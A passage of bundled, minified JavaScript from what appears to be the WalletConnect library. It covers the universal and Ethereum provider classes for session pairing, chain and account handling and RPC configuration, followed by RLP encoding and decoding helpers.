            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
var $253fb4de41dc743b$var$ev = Object.defineProperty, $253fb4de41dc743b$var$rv = Object.defineProperties, $253fb4de41dc743b$var$iv = Object.getOwnPropertyDescriptors, $253fb4de41dc743b$var$Ra = Object.getOwnPropertySymbols, $253fb4de41dc743b$var$sv = Object.prototype.hasOwnProperty, $253fb4de41dc743b$var$uv = Object.prototype.propertyIsEnumerable, $253fb4de41dc743b$var$ba = (C, u, i)=>u in C ? $253fb4de41dc743b$var$ev(C, u, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: i
    }) : C[u] = i, $253fb4de41dc743b$var$cr = (C, u)=>{
    for(var i in u || (u = {}))$253fb4de41dc743b$var$sv.call(u, i) && $253fb4de41dc743b$var$ba(C, i, u[i]);
    if ($253fb4de41dc743b$var$Ra) for (var i of $253fb4de41dc743b$var$Ra(u))$253fb4de41dc743b$var$uv.call(u, i) && $253fb4de41dc743b$var$ba(C, i, u[i]);
    return C;
}, $253fb4de41dc743b$var$Fi = (C, u)=>$253fb4de41dc743b$var$rv(C, $253fb4de41dc743b$var$iv(u));
class $253fb4de41dc743b$export$2e2bcd8739ae039 {
    constructor(u){
        this.events = new (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))), this.rpcProviders = {}, this.shouldAbortPairingAttempt = !1, this.maxPairingAttempts = 10, this.disableProviderPing = !1, this.providerOpts = u, this.logger = typeof u?.logger < "u" && typeof u?.logger != "string" ? u.logger : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: u?.logger || $253fb4de41dc743b$var$Ca
        })), this.disableProviderPing = u?.disableProviderPing || !1;
    }
    static async init(u) {
        const i = new $253fb4de41dc743b$export$2e2bcd8739ae039(u);
        return await i.initialize(), i;
    }
    async request(u, i) {
        const [p, I] = this.validateChain(i);
        if (!this.session) throw new Error("Please call connect() before request()");
        return await this.getProvider(p).request({
            request: $253fb4de41dc743b$var$cr({}, u),
            chainId: `${p}:${I}`,
            topic: this.session.topic
        });
    }
    sendAsync(u, i, p) {
        this.request(u, p).then((I)=>i(null, I)).catch((I)=>i(I, void 0));
    }
    async enable() {
        if (!this.client) throw new Error("Sign Client not initialized");
        return this.session || await this.connect({
            namespaces: this.namespaces,
            optionalNamespaces: this.optionalNamespaces,
            sessionProperties: this.sessionProperties
        }), await this.requestAccounts();
    }
    async disconnect() {
        var u;
        if (!this.session) throw new Error("Please call connect() before enable()");
        await this.client.disconnect({
            topic: (u = this.session) == null ? void 0 : u.topic,
            reason: (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")
        }), await this.cleanup();
    }
    async connect(u) {
        if (!this.client) throw new Error("Sign Client not initialized");
        if (this.setNamespaces(u), await this.cleanupPendingPairings(), !u.skipPairing) return await this.pair(u.pairingTopic);
    }
    on(u, i) {
        this.events.on(u, i);
    }
    once(u, i) {
        this.events.once(u, i);
    }
    removeListener(u, i) {
        this.events.removeListener(u, i);
    }
    off(u, i) {
        this.events.off(u, i);
    }
    get isWalletConnect() {
        return !0;
    }
    async pair(u) {
        this.shouldAbortPairingAttempt = !1;
        let i = 0;
        do {
            if (this.shouldAbortPairingAttempt) throw new Error("Pairing aborted");
            if (i >= this.maxPairingAttempts) throw new Error("Max auto pairing attempts reached");
            const { uri: p, approval: I } = await this.client.connect({
                pairingTopic: u,
                requiredNamespaces: this.namespaces,
                optionalNamespaces: this.optionalNamespaces,
                sessionProperties: this.sessionProperties
            });
            p && (this.uri = p, this.events.emit("display_uri", p)), await I().then((D)=>{
                this.session = D, this.namespaces || (this.namespaces = $253fb4de41dc743b$var$Jg(D.namespaces), this.persist("namespaces", this.namespaces));
            }).catch((D)=>{
                if (D.message !== (0, $4a472e843fedf2e2$export$1e6a4dc5172f4830)) throw D;
                i++;
            });
        }while (!this.session);
        return this.onConnect(), this.session;
    }
    setDefaultChain(u, i) {
        try {
            if (!this.session) return;
            const [p, I] = this.validateChain(u);
            this.getProvider(p).setDefaultChain(I, i);
        } catch (p) {
            if (!/Please call connect/.test(p.message)) throw p;
        }
    }
    async cleanupPendingPairings(u = {}) {
        this.logger.info("Cleaning up inactive pairings...");
        const i = this.client.pairing.getAll();
        if ((0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(i)) {
            for (const p of i)u.deletePairings ? this.client.core.expirer.set(p.topic, 0) : await this.client.core.relayer.subscriber.unsubscribe(p.topic);
            this.logger.info(`Inactive pairings cleared: ${i.length}`);
        }
    }
    abortPairingAttempt() {
        this.shouldAbortPairingAttempt = !0;
    }
    async checkStorage() {
        if (this.namespaces = await this.getFromStore("namespaces"), this.optionalNamespaces = await this.getFromStore("optionalNamespaces") || {}, this.client.session.length) {
            const u = this.client.session.keys.length - 1;
            this.session = this.client.session.get(this.client.session.keys[u]), this.createProviders();
        }
    }
    async initialize() {
        this.logger.trace("Initialized"), await this.createClient(), await this.checkStorage(), this.registerEventListeners();
    }
    async createClient() {
        this.client = this.providerOpts.client || await (0, $4a472e843fedf2e2$export$2e2bcd8739ae039).init({
            logger: this.providerOpts.logger || $253fb4de41dc743b$var$Ca,
            relayUrl: this.providerOpts.relayUrl || $253fb4de41dc743b$var$Hg,
            projectId: this.providerOpts.projectId,
            metadata: this.providerOpts.metadata,
            storageOptions: this.providerOpts.storageOptions,
            storage: this.providerOpts.storage,
            name: this.providerOpts.name
        }), this.logger.trace("SignClient Initialized");
    }
    createProviders() {
        if (!this.client) throw new Error("Sign Client not initialized");
        if (!this.session) throw new Error("Session not initialized. Please call connect() before enable()");
        const u = [
            ...new Set(Object.keys(this.session.namespaces).map((i)=>(0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(i)))
        ];
        $253fb4de41dc743b$var$Wi("client", this.client), $253fb4de41dc743b$var$Wi("events", this.events), $253fb4de41dc743b$var$Wi("disableProviderPing", this.disableProviderPing), u.forEach((i)=>{
            if (!this.session) return;
            const p = $253fb4de41dc743b$var$Kg(i, this.session), I = $253fb4de41dc743b$var$ya(p), D = $253fb4de41dc743b$var$Yg(this.namespaces, this.optionalNamespaces), F = $253fb4de41dc743b$var$Fi($253fb4de41dc743b$var$cr({}, D[i]), {
                accounts: p,
                chains: I
            });
            switch(i){
                case "eip155":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$Qg({
                        namespace: F
                    });
                    break;
                case "solana":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$Vg({
                        namespace: F
                    });
                    break;
                case "cosmos":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$kg({
                        namespace: F
                    });
                    break;
                case "polkadot":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$Xg({
                        namespace: F
                    });
                    break;
                case "cip34":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$jg({
                        namespace: F
                    });
                    break;
                case "elrond":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$nv({
                        namespace: F
                    });
                    break;
                case "multiversx":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$tv({
                        namespace: F
                    });
                    break;
            }
        });
    }
    registerEventListeners() {
        if (typeof this.client > "u") throw new Error("Sign Client is not initialized");
        this.client.on("session_ping", (u)=>{
            this.events.emit("session_ping", u);
        }), this.client.on("session_event", (u)=>{
            const { params: i } = u, { event: p } = i;
            if (p.name === "accountsChanged") {
                const I = p.data;
                I && (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(I) && this.events.emit("accountsChanged", I.map($253fb4de41dc743b$var$Zg));
            } else p.name === "chainChanged" ? this.onChainChanged(i.chainId) : this.events.emit(p.name, p.data);
            this.events.emit("session_event", u);
        }), this.client.on("session_update", ({ topic: u, params: i })=>{
            var p;
            const { namespaces: I } = i, D = (p = this.client) == null ? void 0 : p.session.get(u);
            this.session = $253fb4de41dc743b$var$Fi($253fb4de41dc743b$var$cr({}, D), {
                namespaces: I
            }), this.onSessionUpdate(), this.events.emit("session_update", {
                topic: u,
                params: i
            });
        }), this.client.on("session_delete", async (u)=>{
            await this.cleanup(), this.events.emit("session_delete", u), this.events.emit("disconnect", $253fb4de41dc743b$var$Fi($253fb4de41dc743b$var$cr({}, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), {
                data: u.topic
            }));
        }), this.on($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, (u)=>{
            this.onChainChanged(u, !0);
        });
    }
    getProvider(u) {
        if (!this.rpcProviders[u]) throw new Error(`Provider not found: ${u}`);
        return this.rpcProviders[u];
    }
    onSessionUpdate() {
        Object.keys(this.rpcProviders).forEach((u)=>{
            var i;
            this.getProvider(u).updateNamespace((i = this.session) == null ? void 0 : i.namespaces[u]);
        });
    }
    setNamespaces(u) {
        const { namespaces: i, optionalNamespaces: p, sessionProperties: I } = u;
        i && Object.keys(i).length && (this.namespaces = i), p && Object.keys(p).length && (this.optionalNamespaces = p), this.sessionProperties = I, this.persist("namespaces", i), this.persist("optionalNamespaces", p);
    }
    validateChain(u) {
        const [i, p] = u?.split(":") || [
            "",
            ""
        ];
        if (!this.namespaces || !Object.keys(this.namespaces).length) return [
            i,
            p
        ];
        if (i && !Object.keys(this.namespaces || {}).map((F)=>(0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(F)).includes(i)) throw new Error(`Namespace '${i}' is not configured. Please call connect() first with namespace config.`);
        if (i && p) return [
            i,
            p
        ];
        const I = (0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(Object.keys(this.namespaces)[0]), D = this.rpcProviders[I].getDefaultChain();
        return [
            I,
            D
        ];
    }
    async requestAccounts() {
        const [u] = this.validateChain();
        return await this.getProvider(u).requestAccounts();
    }
    onChainChanged(u, i = !1) {
        var p;
        if (!this.namespaces) return;
        const [I, D] = this.validateChain(u);
        i || this.getProvider(I).setDefaultChain(D), ((p = this.namespaces[I]) != null ? p : this.namespaces[`${I}:${D}`]).defaultChain = D, this.persist("namespaces", this.namespaces), this.events.emit("chainChanged", D);
    }
    onConnect() {
        this.createProviders(), this.events.emit("connect", {
            session: this.session
        });
    }
    async cleanup() {
        this.session = void 0, this.namespaces = void 0, this.optionalNamespaces = void 0, this.sessionProperties = void 0, this.persist("namespaces", void 0), this.persist("optionalNamespaces", void 0), this.persist("sessionProperties", void 0), await this.cleanupPendingPairings({
            deletePairings: !0
        });
    }
    persist(u, i) {
        this.client.core.storage.setItem(`${$253fb4de41dc743b$var$Ia}/${u}`, i);
    }
    async getFromStore(u) {
        return await this.client.core.storage.getItem(`${$253fb4de41dc743b$var$Ia}/${u}`);
    }
}
const $253fb4de41dc743b$export$63bc40680ab52599 = $253fb4de41dc743b$export$2e2bcd8739ae039;


const $76e4bb4b0df9e886$var$P = "wc", $76e4bb4b0df9e886$var$S = "ethereum_provider", $76e4bb4b0df9e886$var$$ = `${$76e4bb4b0df9e886$var$P}@2:${$76e4bb4b0df9e886$var$S}:`, $76e4bb4b0df9e886$var$j = "https://rpc.walletconnect.com/v1/", $76e4bb4b0df9e886$export$cfec112b6d27bf = [
    "eth_sendTransaction",
    "personal_sign"
], $76e4bb4b0df9e886$export$bc85197675500780 = [
    "eth_accounts",
    "eth_requestAccounts",
    "eth_sendRawTransaction",
    "eth_sign",
    "eth_signTransaction",
    "eth_signTypedData",
    "eth_signTypedData_v3",
    "eth_signTypedData_v4",
    "wallet_switchEthereumChain",
    "wallet_addEthereumChain",
    "wallet_getPermissions",
    "wallet_requestPermissions",
    "wallet_registerOnboarding",
    "wallet_watchAsset",
    "wallet_scanQRCode"
], $76e4bb4b0df9e886$export$2c607e5ce12221af = [
    "chainChanged",
    "accountsChanged"
], $76e4bb4b0df9e886$export$1d352f96d67d51e6 = [
    "message",
    "disconnect",
    "connect"
];
var $76e4bb4b0df9e886$var$N = Object.defineProperty, $76e4bb4b0df9e886$var$q = Object.defineProperties, $76e4bb4b0df9e886$var$D = Object.getOwnPropertyDescriptors, $76e4bb4b0df9e886$var$y = Object.getOwnPropertySymbols, $76e4bb4b0df9e886$var$U = Object.prototype.hasOwnProperty, $76e4bb4b0df9e886$var$Q = Object.prototype.propertyIsEnumerable, $76e4bb4b0df9e886$var$O = (a, t, s)=>t in a ? $76e4bb4b0df9e886$var$N(a, t, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: s
    }) : a[t] = s, $76e4bb4b0df9e886$var$p = (a, t)=>{
    for(var s in t || (t = {}))$76e4bb4b0df9e886$var$U.call(t, s) && $76e4bb4b0df9e886$var$O(a, s, t[s]);
    if ($76e4bb4b0df9e886$var$y) for (var s of $76e4bb4b0df9e886$var$y(t))$76e4bb4b0df9e886$var$Q.call(t, s) && $76e4bb4b0df9e886$var$O(a, s, t[s]);
    return a;
}, $76e4bb4b0df9e886$var$M = (a, t)=>$76e4bb4b0df9e886$var$q(a, $76e4bb4b0df9e886$var$D(t));
function $76e4bb4b0df9e886$var$g(a) {
    return Number(a[0].split(":")[1]);
}
function $76e4bb4b0df9e886$var$f(a) {
    return `0x${a.toString(16)}`;
}
function $76e4bb4b0df9e886$var$L(a) {
    const { chains: t, optionalChains: s, methods: i, optionalMethods: n, events: e, optionalEvents: h, rpcMap: c } = a;
    if (!(0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(t)) throw new Error("Invalid chains");
    const o = {
        chains: t,
        methods: i || $76e4bb4b0df9e886$export$cfec112b6d27bf,
        events: e || $76e4bb4b0df9e886$export$2c607e5ce12221af,
        rpcMap: $76e4bb4b0df9e886$var$p({}, t.length ? {
            [$76e4bb4b0df9e886$var$g(t)]: c[$76e4bb4b0df9e886$var$g(t)]
        } : {})
    }, r = e?.filter((l)=>!$76e4bb4b0df9e886$export$2c607e5ce12221af.includes(l)), d = i?.filter((l)=>!$76e4bb4b0df9e886$export$cfec112b6d27bf.includes(l));
    if (!s && !h && !n && !(r != null && r.length) && !(d != null && d.length)) return {
        required: t.length ? o : void 0
    };
    const C = r?.length && d?.length || !s, I = {
        chains: [
            ...new Set(C ? o.chains.concat(s || []) : s)
        ],
        methods: [
            ...new Set(o.methods.concat(n != null && n.length ? n : $76e4bb4b0df9e886$export$bc85197675500780))
        ],
        events: [
            ...new Set(o.events.concat(h || $76e4bb4b0df9e886$export$1d352f96d67d51e6))
        ],
        rpcMap: c
    };
    return {
        required: t.length ? o : void 0,
        optional: s.length ? I : void 0
    };
}

class $76e4bb4b0df9e886$export$2e2bcd8739ae039 {
    constructor(){
        this.events = new (0, $7etJZ.EventEmitter), this.namespace = "eip155", this.accounts = [], this.chainId = 1, this.STORAGE_KEY = $76e4bb4b0df9e886$var$$, this.on = (t, s)=>(this.events.on(t, s), this), this.once = (t, s)=>(this.events.once(t, s), this), this.removeListener = (t, s)=>(this.events.removeListener(t, s), this), this.off = (t, s)=>(this.events.off(t, s), this), this.parseAccount = (t)=>this.isCompatibleChainId(t) ? this.parseAccountId(t).address : t, this.signer = {}, this.rpc = {};
    }
    static async init(t) {
        const s = new $76e4bb4b0df9e886$export$2e2bcd8739ae039;
        return await s.initialize(t), s;
    }
    async request(t) {
        return await this.signer.request(t, this.formatChainId(this.chainId));
    }
    sendAsync(t, s) {
        this.signer.sendAsync(t, s, this.formatChainId(this.chainId));
    }
    get connected() {
        return this.signer.client ? this.signer.client.core.relayer.connected : !1;
    }
    get connecting() {
        return this.signer.client ? this.signer.client.core.relayer.connecting : !1;
    }
    async enable() {
        return this.session || await this.connect(), await this.request({
            method: "eth_requestAccounts"
        });
    }
    async connect(t) {
        if (!this.signer.client) throw new Error("Provider not initialized. Call init() first");
        this.loadConnectOpts(t);
        const { required: s, optional: i } = $76e4bb4b0df9e886$var$L(this.rpc);
        try {
            const n = await new Promise(async (h, c)=>{
                var o;
                this.rpc.showQrModal && ((o = this.modal) == null || o.subscribeModal((r)=>{
                    !r.open && !this.signer.session && (this.signer.abortPairingAttempt(), c(new Error("Connection request reset. Please try again.")));
                })), await this.signer.connect($76e4bb4b0df9e886$var$M($76e4bb4b0df9e886$var$p({
                    namespaces: $76e4bb4b0df9e886$var$p({}, s && {
                        [this.namespace]: s
                    })
                }, i && {
                    optionalNamespaces: {
                        [this.namespace]: i
                    }
                }), {
                    pairingTopic: t?.pairingTopic
                })).then((r)=>{
                    h(r);
                }).catch((r)=>{
                    c(new Error(r.message));
                });
            });
            if (!n) return;
            this.setChainIds(this.rpc.chains);
            const e = (0, $a5d33cfc7f8e5437$export$23329703ad972840)(n.namespaces, [
                this.namespace
            ]);
            this.setAccounts(e), this.events.emit("connect", {
                chainId: $76e4bb4b0df9e886$var$f(this.chainId)
            });
        } catch (n) {
            throw this.signer.logger.error(n), n;
        } finally{
            this.modal && this.modal.closeModal();
        }
    }
    async disconnect() {
        this.session && await this.signer.disconnect(), this.reset();
    }
    get isWalletConnect() {
        return !0;
    }
    get session() {
        return this.signer.session;
    }
    registerEventListeners() {
        this.signer.on("session_event", (t)=>{
            const { params: s } = t, { event: i } = s;
            i.name === "accountsChanged" ? (this.accounts = this.parseAccounts(i.data), this.events.emit("accountsChanged", this.accounts)) : i.name === "chainChanged" ? this.setChainId(this.formatChainId(i.data)) : this.events.emit(i.name, i.data), this.events.emit("session_event", t);
        }), this.signer.on("chainChanged", (t)=>{
            const s = parseInt(t);
            this.chainId = s, this.events.emit("chainChanged", $76e4bb4b0df9e886$var$f(this.chainId)), this.persist();
        }), this.signer.on("session_update", (t)=>{
            this.events.emit("session_update", t);
        }), this.signer.on("session_delete", (t)=>{
            this.reset(), this.events.emit("session_delete", t), this.events.emit("disconnect", $76e4bb4b0df9e886$var$M($76e4bb4b0df9e886$var$p({}, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), {
                data: t.topic,
                name: "USER_DISCONNECTED"
            }));
        }), this.signer.on("display_uri", (t)=>{
            var s, i;
            this.rpc.showQrModal && ((s = this.modal) == null || s.closeModal(), (i = this.modal) == null || i.openModal({
                uri: t
            })), this.events.emit("display_uri", t);
        });
    }
    switchEthereumChain(t) {
        this.request({
            method: "wallet_switchEthereumChain",
            params: [
                {
                    chainId: t.toString(16)
                }
            ]
        });
    }
    isCompatibleChainId(t) {
        return typeof t == "string" ? t.startsWith(`${this.namespace}:`) : !1;
    }
    formatChainId(t) {
        return `${this.namespace}:${t}`;
    }
    parseChainId(t) {
        return Number(t.split(":")[1]);
    }
    setChainIds(t) {
        const s = t.filter((i)=>this.isCompatibleChainId(i)).map((i)=>this.parseChainId(i));
        s.length && (this.chainId = s[0], this.events.emit("chainChanged", $76e4bb4b0df9e886$var$f(this.chainId)), this.persist());
    }
    setChainId(t) {
        if (this.isCompatibleChainId(t)) {
            const s = this.parseChainId(t);
            this.chainId = s, this.switchEthereumChain(s);
        }
    }
    parseAccountId(t) {
        const [s, i, n] = t.split(":");
        return {
            chainId: `${s}:${i}`,
            address: n
        };
    }
    setAccounts(t) {
        this.accounts = t.filter((s)=>this.parseChainId(this.parseAccountId(s).chainId) === this.chainId).map((s)=>this.parseAccountId(s).address), this.events.emit("accountsChanged", this.accounts);
    }
    getRpcConfig(t) {
        var s, i;
        const n = (s = t?.chains) != null ? s : [], e = (i = t?.optionalChains) != null ? i : [], h = n.concat(e);
        if (!h.length) throw new Error("No chains specified in either `chains` or `optionalChains`");
        const c = n.length ? t?.methods || $76e4bb4b0df9e886$export$cfec112b6d27bf : [], o = n.length ? t?.events || $76e4bb4b0df9e886$export$2c607e5ce12221af : [], r = t?.optionalMethods || [], d = t?.optionalEvents || [], C = t?.rpcMap || this.buildRpcMap(h, t.projectId), I = t?.qrModalOptions || void 0;
        return {
            chains: n?.map((l)=>this.formatChainId(l)),
            optionalChains: e.map((l)=>this.formatChainId(l)),
            methods: c,
            events: o,
            optionalMethods: r,
            optionalEvents: d,
            rpcMap: C,
            showQrModal: !!(t != null && t.showQrModal),
            qrModalOptions: I,
            projectId: t.projectId,
            metadata: t.metadata
        };
    }
    buildRpcMap(t, s) {
        const i = {};
        return t.forEach((n)=>{
            i[n] = this.getRpcUrl(n, s);
        }), i;
    }
    async initialize(t) {
        if (this.rpc = this.getRpcConfig(t), this.chainId = this.rpc.chains.length ? $76e4bb4b0df9e886$var$g(this.rpc.chains) : $76e4bb4b0df9e886$var$g(this.rpc.optionalChains), this.signer = await (0, $253fb4de41dc743b$export$63bc40680ab52599).init({
            projectId: this.rpc.projectId,
            metadata: this.rpc.metadata,
            disableProviderPing: t.disableProviderPing,
            relayUrl: t.relayUrl,
            storageOptions: t.storageOptions
        }), this.registerEventListeners(), await this.loadPersistedSession(), this.rpc.showQrModal) {
            let s;
            try {
                const { WalletConnectModal: i } = await (parcelRequire("yQvku"));
                s = i;
            } catch  {
                throw new Error("To use QR modal, please install @walletconnect/modal package");
            }
            if (s) try {
                this.modal = new s($76e4bb4b0df9e886$var$p({
                    walletConnectVersion: 2,
                    projectId: this.rpc.projectId,
                    standaloneChains: this.rpc.chains
                }, this.rpc.qrModalOptions));
            } catch (i) {
                throw this.signer.logger.error(i), new Error("Could not generate WalletConnectModal Instance");
            }
        }
    }
    loadConnectOpts(t) {
        if (!t) return;
        const { chains: s, optionalChains: i, rpcMap: n } = t;
        s && (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(s) && (this.rpc.chains = s.map((e)=>this.formatChainId(e)), s.forEach((e)=>{
            this.rpc.rpcMap[e] = n?.[e] || this.getRpcUrl(e);
        })), i && (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(i) && (this.rpc.optionalChains = [], this.rpc.optionalChains = i?.map((e)=>this.formatChainId(e)), i.forEach((e)=>{
            this.rpc.rpcMap[e] = n?.[e] || this.getRpcUrl(e);
        }));
    }
    getRpcUrl(t, s) {
        var i;
        return ((i = this.rpc.rpcMap) == null ? void 0 : i[t]) || `${$76e4bb4b0df9e886$var$j}?chainId=eip155:${t}&projectId=${s || this.rpc.projectId}`;
    }
    async loadPersistedSession() {
        if (!this.session) return;
        const t = await this.signer.client.core.storage.getItem(`${this.STORAGE_KEY}/chainId`), s = this.session.namespaces[`${this.namespace}:${t}`] ? this.session.namespaces[`${this.namespace}:${t}`] : this.session.namespaces[this.namespace];
        this.setChainIds(t ? [
            this.formatChainId(t)
        ] : s?.accounts), this.setAccounts(s?.accounts);
    }
    reset() {
        this.chainId = 1, this.accounts = [];
    }
    persist() {
        this.session && this.signer.client.core.storage.setItem(`${this.STORAGE_KEY}/chainId`, this.chainId);
    }
    parseAccounts(t) {
        return typeof t == "string" || t instanceof String ? [
            this.parseAccount(t)
        ] : t.map((s)=>this.parseAccount(s));
    }
}
const $76e4bb4b0df9e886$export$cdfbbad9b2980226 = $76e4bb4b0df9e886$export$2e2bcd8739ae039;



var $ba9223f47ca24472$exports = {};
"use strict";
Object.defineProperty($ba9223f47ca24472$exports, "__esModule", {
    value: true
});
$ba9223f47ca24472$exports.utils = $ba9223f47ca24472$exports.decode = $ba9223f47ca24472$exports.encode = void 0;
/**
 * RLP Encoding based on https://eth.wiki/en/fundamentals/rlp
 * This function takes in data, converts it to Uint8Array if not,
 * and adds a length for recursion.
 * @param input Will be converted to Uint8Array
 * @returns Uint8Array of encoded data
 **/ function $ba9223f47ca24472$var$encode(input) {
    if (Array.isArray(input)) {
        const output = [];
        for(let i = 0; i < input.length; i++)output.push($ba9223f47ca24472$var$encode(input[i]));
        const buf = $ba9223f47ca24472$var$concatBytes(...output);
        return $ba9223f47ca24472$var$concatBytes($ba9223f47ca24472$var$encodeLength(buf.length, 192), buf);
    }
    const inputBuf = $ba9223f47ca24472$var$toBytes(input);
    if (inputBuf.length === 1 && inputBuf[0] < 128) return inputBuf;
    return $ba9223f47ca24472$var$concatBytes($ba9223f47ca24472$var$encodeLength(inputBuf.length, 128), inputBuf);
}
$ba9223f47ca24472$exports.encode = $ba9223f47ca24472$var$encode;
/**
 * Slices a Uint8Array, throws if the slice goes out-of-bounds of the Uint8Array.
 * E.g. `safeSlice(hexToBytes('aa'), 1, 2)` will throw.
 * @param input
 * @param start
 * @param end
 */ function $ba9223f47ca24472$var$safeSlice(input, start, end) {
    if (end > input.length) throw new Error("invalid RLP (safeSlice): end slice of Uint8Array out-of-bounds");
    return input.slice(start, end);
}
/**
 * Parse integers. Check if there is no leading zeros
 * @param v The value to parse
 */ function $ba9223f47ca24472$var$decodeLength(v) {
    if (v[0] === 0) throw new Error("invalid RLP: extra zeros");
    return $ba9223f47ca24472$var$parseHexByte($ba9223f47ca24472$var$bytesToHex(v));
}
function $ba9223f47ca24472$var$encodeLength(len, offset) {
    if (len < 56) return Uint8Array.from([
        len + offset
    ]);
    const hexLength = $ba9223f47ca24472$var$numberToHex(len);
    const lLength = hexLength.length / 2;
    const firstByte = $ba9223f47ca24472$var$numberToHex(offset + 55 + lLength);
    return Uint8Array.from($ba9223f47ca24472$var$hexToBytes(firstByte + hexLength));
}
function $ba9223f47ca24472$var$decode(input, stream = false) {
    if (!input || input.length === 0) return Uint8Array.from([]);
    const inputBytes = $ba9223f47ca24472$var$toBytes(input);
    const decoded = $ba9223f47ca24472$var$_decode(inputBytes);
    if (stream) return decoded;
    if (decoded.remainder.length !== 0) throw new Error("invalid RLP: remainder must be zero");
    return decoded.data;
}
$ba9223f47ca24472$exports.decode = $ba9223f47ca24472$var$decode;
/** Decode an input with RLP */ function $ba9223f47ca24472$var$_decode(input) {
    let length, llength, data, innerRemainder, d;
    const decoded = [];
    const firstByte = input[0];
    if (firstByte <= 0x7f) // a single byte whose value is in the [0x00, 0x7f] range, that byte is its own RLP encoding.
    return {
        data: input.slice(0, 1),
        remainder: input.slice(1)
    };
    else if (firstByte <= 0xb7) {
        // string is 0-55 bytes long. A single byte with value 0x80 plus the length of the string followed by the string
        // The range of the first byte is [0x80, 0xb7]
        length = firstByte - 0x7f;
        // set 0x80 null to 0
        if (firstByte === 0x80) data = Uint8Array.from([]);
        else data = $ba9223f47ca24472$var$safeSlice(input, 1, length);
        if (length === 2 && data[0] < 0x80) throw new Error("invalid RLP encoding: invalid prefix, single byte < 0x80 are not prefixed");
        return {
            data: data,
            remainder: input.slice(length)
        };
    } else if (firstByte <= 0xbf) {
        // string is greater than 55 bytes long. A single byte with the value (0xb7 plus the length of the length),
        // followed by the length, followed by the string
        llength = firstByte - 0xb6;
        if (input.length - 1 < llength) throw new Error("invalid RLP: not enough bytes for string length");
        length = $ba9223f47ca24472$var$decodeLength($ba9223f47ca24472$var$safeSlice(input, 1, llength));
        if (length <= 55) throw new Error("invalid RLP: expected string length to be greater than 55");
        data = $ba9223f47ca24472$var$safeSlice(input, llength, length + llength);
        return {
            data: data,
            remainder: input.slice(length + llength)
        };
    } else if (firstByte <= 0xf7) {
        // a list between 0-55 bytes long
        length = firstByte - 0xbf;
        innerRemainder = $ba9223f47ca24472$var$safeSlice(input, 1, length);
        while(innerRemainder.length){
            d = $ba9223f47ca24472$var$_decode(innerRemainder);
            decoded.push(d.data);
            innerRemainder = d.remainder;
        }
        return {
            data: decoded,
            remainder: input.slice(length)
        };
    } else {
        // a list over 55 bytes long
        llength = firstByte - 0xf6;
        length = $ba9223f47ca24472$var$decodeLength($ba9223f47ca24472$var$safeSlice(input, 1, llength));
        if (length < 56) throw new Error("invalid RLP: encoded list too short");
        const totalLength = llength + length;
        if (totalLength > input.length) throw new Error("invalid RLP: total length is larger than the data");
        innerRemainder = $ba9223f47ca24472$var$safeSlice(input, llength, totalLength);
        while(innerRemainder.length){
            d = $ba9223f47ca24472$var$_decode(innerRemainder);
            decoded.push(d.data);
            innerRemainder = d.remainder;
        }
        return {
            data: decoded,
            remainder: input.slice(totalLength)
        };
    }
}
const $ba9223f47ca24472$var$cachedHexes = Array.from({
    length: 256
}, (_v, i)=>i.toString(16).padStart(2, "0"));
function $ba9223f47ca24472$var$bytesToHex(uint8a) {
    // Pre-caching chars with `cachedHexes` speeds this up 6x
    let hex = "";
    for(let i = 0; i < uint8a.length; i++)hex += $ba9223f47ca24472$var$cachedHexes[uint8a[i]];
    return hex;
}
function $ba9223f47ca24472$var$parseHexByte(hexByte) {
    const byte = Number.parseInt(hexByte, 16);
    if (Number.isNaN(byte)) throw new Error("Invalid byte sequence");
    return byte;
}
// Caching slows it down 2-3x
function $ba9223f47ca24472$var$hexToBytes(hex) {
    if (typeof hex !== "string") throw new TypeError("hexToBytes: expected string, got " + typeof hex);
    if (hex.length % 2) throw new Error("hexToBytes: received invalid unpadded hex");
    const array = new Uint8Array(hex.length / 2);
    for(let i = 0; i < array.length; i++){
        const j = i * 2;
        array[i] = $ba9223f47ca24472$var$parseHexByte(hex.slice(j, j + 2));
    }
    return array;
}
/** Concatenates two Uint8Arrays into one. */ function $ba9223f47ca24472$var$concatBytes(...arrays) {
    if (arrays.length === 1) return arrays[0];
    const length = arrays.reduce((a, arr)=>a + arr.length, 0);
    const result = new Uint8Array(length);
    for(let i = 0, pad = 0; i < arrays.length; i++){
        const arr = arrays[i];
        result.set(arr, pad);
        pad += arr.length;
    }
    return result;
}
function $ba9223f47ca24472$var$utf8ToBytes(utf) {
